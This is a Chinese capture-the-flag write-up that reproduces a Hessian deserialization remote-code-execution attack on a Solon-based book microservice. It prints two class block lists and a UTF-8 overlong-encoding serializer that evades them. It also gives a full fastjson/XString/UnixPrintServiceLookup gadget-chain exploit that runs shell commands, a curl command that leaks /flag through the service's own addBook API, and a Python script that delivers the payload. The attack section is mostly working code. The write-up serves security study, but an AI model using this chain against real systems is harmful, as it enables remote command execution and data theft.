前言

当时ciscn&长城杯场上的一题零解题,当时反编译看了一下这题的源码,发现是微服务形式的,有个ApiGateway,然后看了半天也找不到反序列化的点,甚至连请求哪个路由都不清楚🥲然后用的又是solon这个框架不熟悉,直接开摆了

后来看到有师傅解出来了,遂来复现一下

复现

看了一下才发现网关这里限制了我们的路由前缀(没学过不太懂😭,怪不得直接getAllBooks什么都没有

image-20250112172824168

直接问deepseek的解释如下:

这段代码实现了一个 API 网关,主要功能包括:

  1. 路由匹配
    • 所有以 /api/rest/ 开头的请求都会被该网关处理。
    • 例如,/api/rest/book 会被映射到 BookServiceImpl 类。
  2. 前置逻辑
    • 在请求处理之前,设置默认的响应渲染格式为 JSON。
  3. 服务注册
    • BookServiceImpl 类注册为处理 /api/rest/book 路径的服务。

image-20250110225521551

这里可以看到用的是solon的2.5.12的版本,当时直接搜是没有搜到该版本的漏洞的,一搜反序列化基本都是2.5.11的

image-20250110225852926

然后这位老哥是从github的issue翻到相关的信息,嘶我突然想到我可以用英文搜一搜试试,被中文限制了,怪不得我每次都找不到exp😭

image-20250110230600436

果然换英文就能搜到很多东西了,可以直接去对应的issue看一看:https://github.com/opensolon/solon/issues/226,这个issue是用Fury组件的RPC序列化和反序列化的漏洞

image-20250110231433766

但是题目给的这个版本为啥压根就没这东西。。。

image-20250110231514440

然后老哥是找的再往前的一个RCE的issue:https://github.com/opensolon/solon/issues/73

该issue的漏洞是一个Hessian反序列化,在org/noear/solon/serialization/hessian/HessianActionExecutor.java这个类里面的漏洞代码如下:

@Override
protected Object changeBody(Context ctx) throws Exception {
Hessian2Input hi = new Hessian2Input(new ByteArrayInputStream(ctx.bodyAsBytes()));
return hi.readObject();
}

image-20250110232003916

所以如果Content-Type 为 application/hessian ,则发送到含参 RESTful API 的 Request 中的 Body 部分会被 Hessian 进行反序列化,但是题目这里是手动加了一个tested方法来过滤

顺便看了一下原作者的修复,是将对hessian的依赖改成sofa-hessian,该版本用的也是sofa-hessian,有趣的是后面又有issue把sofa-hessian给绕了:https://github.com/opensolon/solon/issues/145

waf绕过

看一下他的过滤方法,sofa-hessian本身就是利用了黑名单的方式,里面在hessian反序列化的过程进行了patch

在com.alibaba.com.caucho.hessian.io/ClassFactory里面,emmm但是说实话这里挺奇怪的,我本地下了sofa-hessian他是并没有这个ClassFactory的,反而是在正常的hessian里面的,sofa-hessian的黑名单是另一种方式的:

static {
_staticAllowList = new ArrayList<Allow>();

ClassLoader classLoader = ClassFactory.class.getClassLoader();
List<String> stringList = new ArrayList<>();
for (byte[] bytes : byteArray) {
stringList.add(new String(bytes));
}
String[] denyClasses = stringList.toArray(new String[0]);
for (String denyClass : denyClasses) {
if (denyClass.startsWith("#")) {
continue;
}
if (denyClass.endsWith(".")) {
_staticAllowList.add(new AllowPrefix(denyClass, false));
} else {
_staticAllowList.add(new Allow(toPattern(denyClass), false));
}
}
}

黑名单如下:

bsh.
ch.qos.logback.core.db.
clojure.
com.alibaba.citrus.springext.support.parser.
com.alibaba.citrus.springext.util.SpringExtUtil.
com.alibaba.druid.pool.
com.alibaba.hotcode.internal.org.apache.commons.collections.functors.
com.alipay.custrelation.service.model.redress.
com.alipay.oceanbase.obproxy.druid.pool.
com.caucho.config.types.
com.caucho.hessian.test.
com.caucho.naming.
com.ibm.jtc.jax.xml.bind.v2.runtime.unmarshaller.
com.ibm.xltxe.rnm1.xtq.bcel.util.
com.mchange.v2.c3p0.
com.mysql.jdbc.util.
com.rometools.rome.feed.
com.sun.corba.se.impl.
com.sun.corba.se.spi.orbutil.
com.sun.jndi.rmi.
com.sun.jndi.toolkit.
com.sun.org.apache.bcel.internal.
com.sun.org.apache.xalan.internal.
com.sun.rowset.
com.sun.xml.internal.bind.v2.
com.taobao.vipserver.commons.collections.functors.
groovy.lang.
java.awt.
java.beans.
java.lang.ProcessBuilder
java.lang.Runtime
java.rmi.server.
java.security.
java.util.ServiceLoader
java.util.StringTokenizer
javassist.bytecode.annotation.
javassist.tools.web.Viewer
javassist.util.proxy.
javax.imageio.
javax.imageio.spi.
javax.management.
javax.media.jai.remote.
javax.naming.
javax.script.
javax.sound.sampled.
javax.swing.
javax.xml.transform.
net.bytebuddy.dynamic.loading.
oracle.jdbc.connector.
oracle.jdbc.pool.
org.apache.aries.transaction.jms.
org.apache.bcel.util.
org.apache.carbondata.core.scan.expression.
org.apache.commons.beanutils.
org.apache.commons.codec.binary.
org.apache.commons.collections.functors.
org.apache.commons.collections4.functors.
org.apache.commons.configuration.
org.apache.commons.configuration2.
org.apache.commons.dbcp.datasources.
org.apache.commons.dbcp2.datasources.
org.apache.commons.fileupload.disk.
org.apache.ibatis.executor.loader.
org.apache.ibatis.javassist.bytecode.
org.apache.ibatis.javassist.tools.
org.apache.ibatis.javassist.util.
org.apache.ignite.cache.
org.apache.log.output.db.
org.apache.log4j.receivers.db.
org.apache.myfaces.view.facelets.el.
org.apache.openjpa.ee.
org.apache.openjpa.ee.
org.apache.shiro.
org.apache.tomcat.dbcp.
org.apache.velocity.runtime.
org.apache.velocity.
org.apache.wicket.util.
org.apache.xalan.xsltc.trax.
org.apache.xbean.naming.context.
org.apache.xpath.
org.apache.zookeeper.
org.aspectj.apache.bcel.util.
org.codehaus.groovy.runtime.
org.datanucleus.store.rdbms.datasource.dbcp.datasources.
org.eclipse.jetty.util.log.
org.geotools.filter.
org.h2.value.
org.hibernate.tuple.component.
org.hibernate.type.
org.jboss.ejb3.
org.jboss.proxy.ejb.
org.jboss.resteasy.plugins.server.resourcefactory.
org.jboss.weld.interceptor.builder.
org.mockito.internal.creation.cglib.
org.mortbay.log.
org.quartz.
org.springframework.aop.aspectj.
org.springframework.beans.BeanWrapperImpl$BeanPropertyHandler
org.springframework.beans.factory.
org.springframework.expression.spel.
org.springframework.jndi.
org.springframework.orm.
org.springframework.transaction.
org.yaml.snakeyaml.tokens.
pstore.shaded.org.apache.commons.collections.
sun.rmi.server.
sun.rmi.transport.
weblogic.ejb20.internal.
weblogic.jms.common.

然后题目这里还有一个自己的黑名单

image-20250110234707451

testCases就用二维数组存放过滤的类,过滤的类如下:

bsh.
ch.qos.logback.core.db.
clojure.
com.alibaba.citrus.springext.support.parser.
com.alibaba.citrus.springext.util.SpringExtUtil.
com.alibaba.druid.pool.
com.alibaba.hotcode.internal.org.apache.commons.collections.functors.
com.alipay.custrelation.service.model.redress.
com.alipay.oceanbase.obproxy.druid.pool.
com.caucho.config.types.
com.caucho.hessian.test.
com.caucho.naming.
com.ibm.jtc.jax.xml.bind.v2.runtime.unmarshaller.
com.ibm.xltxe.rnm1.xtq.bcel.util.
com.mchange.v2.c3p0.
com.mysql.jdbc.util.
com.rometools.rome.feed.
com.sun.corba.se.impl.
com.sun.corba.se.spi.orbutil.
com.sun.jndi.rmi.
com.sun.jndi.toolkit.
com.sun.org.apache.bcel.internal.
com.sun.org.apache.xalan.internal.
com.sun.rowset.
com.sun.xml.internal.bind.v2.
com.taobao.vipserver.commons.collections.functors.
groovy.lang.
java.awt.
java.beans.
java.lang.ProcessBuilder
java.lang.Runtime
java.rmi.server.
java.security.
java.util.ServiceLoader
java.util.StringTokenizer
javassist.bytecode.annotation.
javassist.tools.web.Viewer
javassist.util.proxy.
javax.imageio.
javax.imageio.spi.
javax.management.
javax.media.jai.remote.
javax.naming.
javax.script.
javax.sound.sampled.
javax.swing.
javax.xml.transform.
net.bytebuddy.dynamic.loading.
oracle.jdbc.connector.
oracle.jdbc.pool.
org.apache.aries.transaction.jms.
org.apache.bcel.util.
org.apache.carbondata.core.scan.expression.
org.apache.commons.beanutils.
org.apache.commons.codec.binary.
org.apache.commons.collections.functors.
org.apache.commons.collections4.functors.
org.apache.commons.codec.
org.apache.commons.configuration.
org.apache.commons.configuration2.
org.apache.commons.dbcp.datasources.
org.apache.commons.dbcp2.datasources.
org.apache.commons.fileupload.disk.
org.apache.ibatis.executor.loader.
org.apache.ibatis.javassist.bytecode.
org.apache.ibatis.javassist.tools.
org.apache.ibatis.javassist.util.
org.apache.ignite.cache.
org.apache.log.output.db.
org.apache.log4j.receivers.db.
org.apache.myfaces.view.facelets.el.
org.apache.openjpa.ee.
org.apache.openjpa.ee.
org.apache.shiro.
org.apache.tomcat.dbcp.
org.apache.velocity.runtime.
org.apache.velocity.
org.apache.wicket.util.
org.apache.xalan.xsltc.trax.
org.apache.xbean.naming.context.
org.apache.xpath.
org.apache.zookeeper.
org.aspectj.
org.codehaus.groovy.runtime.
org.datanucleus.store.rdbms.datasource.dbcp.datasources.
org.dom4j.
org.eclipse.jetty.util.log.
org.geotools.filter.
org.h2.value.
org.hibernate.tuple.component.
org.hibernate.type.
org.jboss.ejb3.
org.jboss.proxy.ejb.
org.jboss.resteasy.plugins.server.resourcefactory.
org.jboss.weld.interceptor.builder.
org.junit.
org.mockito.internal.creation.cglib.
org.mortbay.log.
org.mockito.
org.thymeleaf.
org.quartz.
org.springframework.aop.aspectj.
org.springframework.beans.BeanWrapperImpl$BeanPropertyHandler
org.springframework.beans.factory.
org.springframework.expression.spel.
org.springframework.jndi.
org.springframework.orm.
org.springframework.transaction.
org.yaml.snakeyaml.tokens.
ognl.
pstore.shaded.org.apache.commons.collections.
sun.print.
sun.rmi.server.
sun.rmi.transport.
weblogic.ejb20.internal.
weblogic.jms.common.

这里因为直接检测序列化的字符串,那就可以直接利用UTF-8 Overlong Encoding方法绕过,虽然是Hessian但本质也是一样的,X1r0z✌的文章有说:https://exp10it.io/2024/02/hessian-utf-8-overlong-encoding/

里面也有写好的代码,这里copy一下

package com.example;

import com.caucho.hessian.io.Hessian2Output;

import java.io.IOException;
import java.io.OutputStream;
import java.lang.reflect.Field;

public class Hessian2OutputWithOverlongEncoding extends Hessian2Output {
public Hessian2OutputWithOverlongEncoding(OutputStream os) {
super(os);
}

@Override
public void printString(String v, int strOffset, int length) throws IOException {
int offset = (int) getSuperFieldValue("_offset");
byte[] buffer = (byte[]) getSuperFieldValue("_buffer");

for (int i = 0; i < length; i++) {
if (SIZE <= offset + 16) {
setSuperFieldValue("_offset", offset);
flushBuffer();
offset = (int) getSuperFieldValue("_offset");
}

char ch = v.charAt(i + strOffset);

// 2 bytes UTF-8
buffer[offset++] = (byte) (0xc0 + (convert(ch)[0] & 0x1f));
buffer[offset++] = (byte) (0x80 + (convert(ch)[1] & 0x3f));

// if (ch < 0x80)
// buffer[offset++] = (byte) (ch);
// else if (ch < 0x800) {
// buffer[offset++] = (byte) (0xc0 + ((ch >> 6) & 0x1f));
// buffer[offset++] = (byte) (0x80 + (ch & 0x3f));
// }
// else {
// buffer[offset++] = (byte) (0xe0 + ((ch >> 12) & 0xf));
// buffer[offset++] = (byte) (0x80 + ((ch >> 6) & 0x3f));
// buffer[offset++] = (byte) (0x80 + (ch & 0x3f));
// }
}

setSuperFieldValue("_offset", offset);
}

@Override
public void printString(char[] v, int strOffset, int length) throws IOException {
int offset = (int) getSuperFieldValue("_offset");
byte[] buffer = (byte[]) getSuperFieldValue("_buffer");

for (int i = 0; i < length; i++) {
if (SIZE <= offset + 16) {
setSuperFieldValue("_offset", offset);
flushBuffer();
offset = (int) getSuperFieldValue("_offset");
}

char ch = v[i + strOffset];

// 2 bytes UTF-8
buffer[offset++] = (byte) (0xc0 + (convert(ch)[0] & 0x1f));
buffer[offset++] = (byte) (0x80 + (convert(ch)[1] & 0x3f));

// if (ch < 0x80)
// buffer[offset++] = (byte) (ch);
// else if (ch < 0x800) {
// buffer[offset++] = (byte) (0xc0 + ((ch >> 6) & 0x1f));
// buffer[offset++] = (byte) (0x80 + (ch & 0x3f));
// }
// else {
// buffer[offset++] = (byte) (0xe0 + ((ch >> 12) & 0xf));
// buffer[offset++] = (byte) (0x80 + ((ch >> 6) & 0x3f));
// buffer[offset++] = (byte) (0x80 + (ch & 0x3f));
// }
}

setSuperFieldValue("_offset", offset);
}

public int[] convert(int i) {
int b1 = ((i >> 6) & 0b11111) | 0b11000000;
int b2 = (i & 0b111111) | 0b10000000;
return new int[]{ b1, b2 };
}

public Object getSuperFieldValue(String name) {
try {
Field f = this.getClass().getSuperclass().getDeclaredField(name);
f.setAccessible(true);
return f.get(this);
} catch (Exception e) {
return null;
}
}

public void setSuperFieldValue(String name, Object val) {
try {
Field f = this.getClass().getSuperclass().getDeclaredField(name);
f.setAccessible(true);
f.set(this, val);
} catch (Exception e) {
e.printStackTrace();
}
}
}

然后这里还有一个fastjson1.2.83的版本,可以直接用fastjson原生反序列化的那条链子,不过因为有些类被ban了我们需要绕过,先看一下本来的链子

ObjectInputStream.readObject -> 
HashMap.readObject ->
BadAttributeValueExpException.readObject ->
JSONArray.toString ->
JSON.toString (JSONArray extends JSON)->
JSON.toJSONString ->
TemplatesImpl.getOutputProperties ->
TemplatesImpl.newTransformer

但是这里BadAttributeValueExpException和TemplatesImpl都被过滤了,需要找其他类替换一下,BadAttributeValueExpException我们可以替换成XString,因为XString通过equals来触发toString,而HashMap反序列化的时候刚好会触发

然后TemplatesImpl部分的触发可以换成UnixPrintServiceLookup,不过这个类只在Unix下面才有用,而这部分的利用就在我前面说到的绕过sofa-hessian的issue里面

image-20250112000746624

这得用Linux下的idea调了。。。

UnixPrintServiceLookup类

这里来调一下他的利用方式,因为之前没见过,可以参考这篇文章:https://whoopsunix.com/docs/components/Dubbo/CVE-2022-39198/

UnixPrintServiceLookup 是 Java 打印服务 API 中的一个平台特定实现类,主要用于在 Unix/Linux 系统上查找和管理打印服务。它是 PrintServiceLookup 的一个子类,专门为 Unix 类操作系统(如 Linux、BSD 等)提供打印服务的查找和访问功能。

该类利用的getter方法是sun.print.UnixPrintServiceLookup#getDefaultPrintService(),最终是触发到该类里面的一个execCmd方法

image-20250112162426855

该方法的调用有很多,我们需要找一个参数是我们能够控制的,这里找到了getDefaultPrinterNameBSD()方法

image-20250112170753639

image-20250112170831539

这里传入的参数都是属性值,那我们就可以通过反射来控制了

不过要走到这我们需要满足前面两个条件,isMac()和isSysV()判断的是你的系统是否为macOS和SunOS,可以用反射绕过,我用kali的就不用担心;

还有就是isCupsRunning()方法,isCupsRunning是检测本机的CUPS服务,可以通过访问http://127.0.0.1:631/看看是否开启,我用的kali是没有开启,看别人说Ubuntu默认开启,要注意一下,如果开启了用下面的命令关闭即可

sudo systemctl mask cups
reboot

然后调用的写法类似这样

import sun.print.UnixPrintServiceLookup;

import java.lang.reflect.Field;

public class demo {
public static void setFieldValue(Object obj,String name,Object value)throws Exception{
Field field = obj.getClass().getDeclaredField(name);
field.setAccessible(true);
field.set(obj, value);
}
public static void main(String[] args) throws Exception{
String cmd = "touch /tmp/evilfile";
// Field theUnsafe = Unsafe.class.getDeclaredField("theUnsafe");
// theUnsafe.setAccessible(true);
// Unsafe unsafe = (Unsafe) theUnsafe.get(null);
// Object unixPrintServiceLookup = unsafe.allocateInstance(UnixPrintServiceLookup.class);
UnixPrintServiceLookup unixPrintServiceLookup = new UnixPrintServiceLookup();
setFieldValue(unixPrintServiceLookup, "cmdIndex", 0);
setFieldValue(unixPrintServiceLookup, "osname", "xx");
setFieldValue(unixPrintServiceLookup, "lpcFirstCom", new String[]{cmd, cmd, cmd});
System.out.println(unixPrintServiceLookup.getDefaultPrintService());
}
}

image-20250112171343508

成功执行

不过这里我看大部分都用Unsafe来获取UnixPrintServiceLookup的实例,可该类的构造方法是public的,我上面正常写也是能执行的,怪🤔

exp构造

那现在就可以来改造我们的exp了(直接抄文章的exp

package org.example;

import com.alibaba.fastjson.JSONObject;
import com.caucho.hessian.io.Hessian2Input;
import com.caucho.hessian.io.SerializerFactory;
import com.sun.org.apache.xpath.internal.objects.XString;
import sun.misc.Unsafe;
import sun.print.UnixPrintServiceLookup;

import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.lang.reflect.Array;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.util.HashMap;

public class BookExp {
public static void setValue(Object obj,String name,Object value)throws Exception{
Field field = obj.getClass().getDeclaredField(name);
field.setAccessible(true);
field.set(obj, value);
}
public static void main(String[] args) {
try {
//需要执行的命令
String cmd = "touch /tmp/evilTest";
Field theUnsafe = Unsafe.class.getDeclaredField("theUnsafe");
theUnsafe.setAccessible(true);
Unsafe unsafe = (Unsafe) theUnsafe.get(null);
Object unixPrintServiceLookup = unsafe.allocateInstance(UnixPrintServiceLookup.class);
//设置属性
setValue(unixPrintServiceLookup, "cmdIndex", 0);//绕过getDefaultPrinterNameBSD中的限制
setValue(unixPrintServiceLookup, "osname", "xx");
setValue(unixPrintServiceLookup, "lpcFirstCom", new String[]{cmd, cmd, cmd});

//封装一个JSONObject对象调用getter方法
JSONObject jsonObject = new JSONObject();
jsonObject.put("xx", unixPrintServiceLookup);

//使用XString类调用toString方法
XString xString = new XString("xx");
HashMap map1 = new HashMap();
HashMap map2 = new HashMap();
map1.put("yy",jsonObject);
map1.put("zZ",xString);
map2.put("yy",xString);
map2.put("zZ",jsonObject);

//使用反射赋值,防止序列化过程调用equals方法
HashMap s = new HashMap();
setValue(s, "size", 2);
Class nodeC;
try {
nodeC = Class.forName("java.util.HashMap$Node");
}
catch ( ClassNotFoundException e ) {
nodeC = Class.forName("java.util.HashMap$Entry");
}
Constructor nodeCons = nodeC.getDeclaredConstructor(int.class, Object.class, Object.class, nodeC);
nodeCons.setAccessible(true);
Object tbl = Array.newInstance(nodeC, 2);
Array.set(tbl, 0, nodeCons.newInstance(0, map1, map1, null));
Array.set(tbl, 1, nodeCons.newInstance(0, map2, map2, null));
setValue(s, "table", tbl);

FileOutputStream fileOutputStream=new FileOutputStream("ser");
Hessian2OutPutWithOverlongEncoding hessianOutput = new Hessian2OutPutWithOverlongEncoding(fileOutputStream);
hessianOutput.setSerializerFactory(new SerializerFactory());
hessianOutput.getSerializerFactory().setAllowNonSerializable(true);
hessianOutput.writeObject(s);
hessianOutput.flushBuffer();

// test
Hessian2Input hessian2Input=new Hessian2Input(new FileInputStream("ser"));
hessian2Input.readObject();

}catch (Exception e) {
e.printStackTrace();
}
}
}

image-20250112171920831

ok成功执行

带出数据

原题的靶机是不出网的,不能直接弹shell,所以需要利用一些方式来带出数据,题目给了我们相关的一些服务,

题目中的/addBook 可以动态添加图书内容,且添加的图书内容可以通过 /getAllBooks 回显,那就可以利用该方式拿到来回显flag。

我们要执行的命令就是利用curl去请求服务来添加flag

curl -X POST http://localhost:8080/api/rest/book/addBook -H "Content-Type: application/json" -d '{"bookId": 1, "title": "'$(cat /flag)'", "author": "yuanshan", "publishDate": "2024-12-22", "price": 0.00}'

然后需要写个脚本来发包,因为要直接发hessian数据,burp不好操作,也是直接用文章里的脚本就可以了

import re
import requests

with open("ser", "rb") as f:
body = f.read()

print(len(body))

url = "http://localhost:8080/api/rest/book/getBookById"
headers = { "Content-Type": "application/hessian" }
response = requests.get(url, headers=headers, data=body)
print(response.text)

url = "http://localhost:8080/api/rest/book/getAllBooks"
response = requests.get(url)
print(response.text)

emmm这里一开始我用的nss的环境,但是打过去没反应,本地测试是可以的,那就本地打打算了,放个flag在根目录

image-20250112180917440

这里得注意一下得请求一个接受参数的路由才会走到hessian反序列化的地方,毕竟方法名叫changeBody了,接收Body才能change🤔

参考

https://xz.aliyun.com/t/16878?time__1311=Gui%3DGK0Iq%2BED%2FD0l7GkDujUrF3PNfAeD

https://github.com/opensolon/solon/issues/145

https://whoopsunix.com/docs/components/Dubbo/CVE-2022-39198/

https://www.cnblogs.com/kingbridge/articles/17020853.html